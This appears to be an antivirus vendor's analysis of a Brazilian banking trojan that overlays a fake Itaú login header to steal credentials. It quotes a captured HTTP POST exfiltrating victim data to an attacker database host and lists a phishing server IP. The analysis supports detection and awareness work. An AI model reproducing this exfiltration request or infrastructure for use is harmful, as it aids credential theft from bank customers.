General Information:

Collected Name: fotos.exe
SIZE: 1477530 bytes
MD5: 0475fa8fac3f7bbac0d38a1b89d42e51
Packer: Thinstall

Behavior:

This malware monitors system windows and searchs for some bank string patterns in their titles. If a match occurs, it tries to overlap the bank site login header with a modified one that captures account and credential data. All this information is sent to an online database.

Description:

After its execution trojan registers itself in Run key in Windows Registry. Then it checks if there is an operating system window entitled “Banco Itaú – Feito Para Você – Mozilla Firefox” and tries to overlap the window with a fake header. If the window with the title that matches is not a browser, the process is terminated.

The next figure was taken after accessing the actual Internet Banking with the malware running:

In this point, the malware sample inserts a fake bank header on top of the official bank site header:

After this step, all data informed by the victims in the form fields will be stored in memory and sent to the attacker's database.

Trojan then connects to an online database to inserts collected targets data, such as computer, operating system and users information.

Below, an excerpt of requests sent to database:

POST /phps/procopspro.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Host: webcomunicaobr.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
op=TransacaoAtualizacaoVersaoAtual&servidor=willow%2Esafesecureweb%2Ecom&senha=
<censored>&usuario=compteam&base=compteam&sgdb=MYSQL&nomeexe=fotos%2Eexe&

By accessing this online database it was possible to find out that the attacker centralized the information collected by different banker’s applications, so the table field containing the executable name (e.g., “fotos.exe”) can be used to map which binaries are more effective.

This malware opens locally the (UPD) port 1311 and connects to some IP addresses in HTTP or HTTPS ports.

One of these accesses (https://200.196.152.202/) points to a fake credential header page of a Brazilian bank, as shown below:

One input file is created in the same folder where the binary is located. After the malware reads the contents of this file, it is deleted. The content appears to be encrypted, as shown below:

qe6dt1Huvv1sxeHg
qeHEsu1sx1rjx1LgBhj2D2rSnwH0Fx9OFNHUAx9SFNK1Ehr8
qe9itLPjuLrFwuz3DhzRB290DG
qeHEvvnAx1LgCw91CNrPkI3
qfvuvL9Fwuz3DhzRB290DG
qeHCx1LgvKjisLC
qe9jv7zZB86Ritq7Bh99Ehr8BNvYEhP7EwK1Ehr8ngTZA8G7A8L7EhrRAgTPDdvRC8S
qe9jv1rlxKLAx1rjrNnVB8SHndrSFNL3DhzUDxj3ENr9Atv3Dhy7A2nRAdrRAxr3DgTODgTPnwTZAW

(Thanx to Diego Bassani de Souza)

Read more here: AVG | Top Threats

Tags | AVG virus alert